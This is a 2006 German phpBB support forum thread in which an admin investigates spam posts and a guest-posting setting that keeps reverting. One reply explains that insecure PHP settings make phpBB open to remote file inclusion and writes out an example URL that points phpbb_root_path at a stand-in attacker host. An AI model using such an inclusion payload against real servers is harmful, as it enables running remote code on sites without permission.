phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Forum gehackt?

https://www.phpbb.de/community/viewtopic.php?t=115932

Seite 1 von 1

Forum gehackt?

Verfasst: 19.03.2006 11:15
von reinsle
Hy,

wir hatten bei uns im Forum die letzten Tage 2 Beiträge, einmal ein Link zu diversen Sexseiten, ein anderes mal eine Linkliste zu Online Pharmacie, mit Medikamenten, die unter das Betäubungsmittelgesetz fallen. Daraufin habe ich eben meinen Server untersucht, und auf der Systemebene im ich mir relativ sicher, das mir hier keiner eingebrochen ist. Auch an den Dateien der Forensoftware und den eigenen Webseiten wurde keine veränderung durchgeführt. PHPbb ist eigenltihc auch auf dem aktuellen Stand, die eingebauten MODS auch.

Weiss da jemand, ob im Moment gerade was los ist?

danke euch

Verfasst: 19.03.2006 11:44
von PhilippK
Das sieht mir nach 'einfachem' Spam aus.

Gruß, Philipp

Verfasst: 19.03.2006 12:08
von reinsle
Hy Phillip,

ja, kann sein. Aber in dem Forum, in dem er es postete, konnten nur registrierte Posten, aber der Beitrag war als Gast eingestellt. Das macht mich Nachdenklich.

Verfasst: 19.03.2006 13:20
von PhilippK
Hast du mal 'nen Link zum Board?

Gruß, Philipp

Verfasst: 19.03.2006 15:12
von PeterSwiss
das folgende sollte eigentlich unnötig sein. Wenn im php.ini
register_globals=On ist, und
allow_url_fopen=On,
dann kann das BB mit dem dümmsten aller einfachen Tricks aufgebrochen werden. Ich sah solche Angriffe (im Log, nicht im BB), und ein Blick in index.php zeigt, dass es sogar noch einfacher geht als im Log:

http : //website.tld/forum?phpbb_root_path=http://ichmachewasichwillextension.inc

Abgesehen davon dass im Fall der Original Frage der Poster sich als "Gast" registrieren kann

Verfasst: 19.03.2006 15:38
von reinsle
Hy,

@philip:

http://forum.casablitzblanca.de/phpbb/index.php

@Peter: RegisterGlobals ist natürlich off.

Verfasst: 19.03.2006 15:49
von reinsle
Hy,

ich habs. Wenn man(n) die Augen aufmacht, findet man meist die Fehler. In dem entsprechenden Forum war das Posten von allen erlaubt, also auch von Gästen, was sonst im Forum nicht erlaubt ist.

Danke euch für eure Tips.

Verfasst: 20.03.2006 09:28
von reinsle
Hy,

jetzt hab ich doch etwas neuere Kentnisse. Die besagte Linksliste der Sexforen sidn ja bei uns aufgetaucht, daraufhin hat eine Adminkollegin geschaut, wie die Foreneinstellungen sind, in bezug auf Posten von nichtregistrierten. Da hat sie es umgestellt auf registrierte. Als ich dann wieder geschaut hab ... wars wieder auf alle.

Gibt es einen Exploit, der die Rechteeinstellungen beeinflussen kann?
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de